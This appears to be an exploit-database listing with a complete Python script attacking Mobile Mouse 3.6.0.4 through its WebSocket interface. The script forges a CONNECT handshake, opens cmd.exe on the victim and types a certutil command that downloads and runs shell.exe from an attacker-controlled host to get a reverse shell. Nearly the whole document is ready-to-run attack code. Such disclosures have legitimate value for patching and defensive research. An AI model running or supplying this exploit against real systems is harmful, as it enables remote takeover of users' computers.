Exploit for 📄 Mobile Mouse 3.6.0.4 WebSocket Remote Code Execution

Name: Exploit for 📄 Mobile Mouse 3.6.0.4 WebSocket Remote Code Execution
Rating: 5 (487 reviews)
2025-06-23 | CVSS 8.2
## https://sploitus.com/exploit?id=PACKETSTORM:201226
# Exploit Title: Mobile Mouse 3.6.0.4 WebSocket Remote code execution
    # Date: 06/17/2025
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://mobilemouse.com/
    # Software Link: https://www.mobilemouse.com/downloads/setup.exe
    # Version: 3.6.0.4
    # Tested on: Windows 10 (Build 19044)
    
    
    '''
    Mobile Mouse 3.6.0.4 contains a critical remote code execution
    vulnerability through its WebSocket interface.
    '''
    
    
    #!/usr/bin/env python3
    
    import asyncio
    import websockets
    import uuid
    from time import sleep
    import sys
    
    
    target_ip = "192.168.8.105"
    port = 35913 # default port
    uri = f"ws://{target_ip}:{port}"
    
    lhost = "192.168.8.100"
    payload = "shell.exe"
    
    
    EOR_CHAR = '\x1e'
    EOF_CHAR = '\x04'
    
    async def exploit():
        async with websockets.connect(uri) as ws:
            print("[+] WebSocket connected")
    
    
            field1 = ""  # password if known
            field2_guid = str(uuid.uuid4()).upper()
            field3_device_type = "Desktop"
            field4_version1 = "2"
            field5_version2 = "2"
            field6_version3_key = "{length=32,bytes=0x" + "00" * 32 + "}"
    
            connect_message = (
                f"CONNECT{EOR_CHAR}"
                f"{field1}{EOR_CHAR}"
                f"{field2_guid}{EOR_CHAR}"
                f"{field3_device_type}{EOR_CHAR}"
                f"{field4_version1}{EOR_CHAR}"
                f"{field5_version2}{EOR_CHAR}"
                f"{field6_version3_key}{EOF_CHAR}"
            )
    
            await ws.send(connect_message)
            print(f"[>] Connecting ...")
    
            try:
                response = await asyncio.wait_for(ws.recv(), timeout=5)
                decoded = response.decode("utf-8", errors="ignore") if
    isinstance(response, bytes) else response
                decoded = decoded.strip()
    
                if "Welcome" in decoded:
                    print("[+] CONNECT accepted by server.")
                elif "Please enter a password" in decoded:
                    print("[!] Server requires a password. Aborting.")
                    sys.exit(0)
                else:
                    print(f"[!] Unexpected response: {repr(decoded)}")
            except Exception as e:
                print(f"[!] No response after CONNECT: {e}")
                sys.exit(1)
    
            await asyncio.sleep(3)
    
            cmd = "SENDPROGRAMACTION\x1eRUN\x1ecmd.exe\x04"
            await ws.send(cmd)
            sleep(3)
    
            command_payload = f"KEY\x1e116\x1ecertutil -urlcache -split -f
    http://{lhost}/{payload} C:\\Windows\\Temp\\payload.exe &
    C:\\Windows\\Temp\\payload.exe\x1e\x04"
            await ws.send(command_payload)
    
            print("[+] reverse shell payload sent")
    
            execute = "KEY\x1e-1\x1eENTER\x1e\x04"
            await ws.send(execute)
    
            print("[+] Payload executed, check your listener!")
    
    
    asyncio.run(exploit())